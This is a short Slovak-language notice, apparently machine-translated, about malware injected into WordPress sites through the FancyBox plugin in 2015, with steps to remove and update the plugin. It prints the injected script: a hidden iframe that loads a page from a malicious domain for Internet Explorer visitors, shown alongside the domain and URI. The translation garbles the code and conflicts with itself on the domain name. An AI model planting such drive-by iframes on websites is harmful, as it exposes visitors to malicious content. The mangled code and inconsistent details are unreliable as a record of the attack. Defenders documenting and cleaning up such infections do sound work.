Skôr tento týždeň rad internetových stránok a blogov WordPress, dostali upozornenia infekcie malware skrz Google webmasterov.
Problém, ku ktorému Google webmasterov uvedené je prítomnosť treska / scenár škodlivý softvér iframe zdrojovej webovej stránky.
<script> ak (navigator.userAgent.match (/ msie / i)) {document.write ('<iframe src = "http: /2000koko.eu/hjnfh/ipframe2000.php "šírka =" 203 "height =" 2 "> </ iframe> </ div> '); } </ Script>
Zdá sa, že sa jedná o zraniteľnosť a zapojiťacquis FancyBox pre WordPress ktorý až do včerajška (05.02.2015) neboli aktualizované na dlhú dobu.
Riešenie tohto problému a dezinfekčné vírusy weby s týmto malware, je pomerne jednoduché.
1. Zakážte doplnok FancyBox.
2. Odstráňte všetky súbory doplnkov FancyBox zo servera (cez FTP)
3. Nainštalujte novú verziu doplnku (Fancybox 3.0.4)
Fancybox pre WordPress 3.0.4
- Premenovanie nastavenia ovplyvneného bezpečnostným problémom uvedeným v 3.0.3. To by malo zabrániť tomu, aby sa škodlivý kód zobrazoval na stránkach, kde je doplnok aktualizovaný bez odstránenia škodlivého kódu.
Fancybox pre WordPress 3.0.3
- Opravený problém so zabezpečením.
Informácie o škodlivom softvéri:
TYP: Iframe presmerovanie
TARGET: WordPress Fancybox
Škodlivého softvéru DOMAIN: 203koko.eu
Malware URI: http://203koko.eu/hjnfh/ipframe2.php
RAW malware CODE: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = "20" height = "30"> </ iframe>
Škodlivého softvéru SCRIPT: <script> if (/ / i) navigator.userAgent.match (MSIE) "<=" pozícia: absolute; left: -2000px, šírka: 2000px "div style> {document.write (
Odstránenie škodlivého softvéru z webových stránok WordPress.
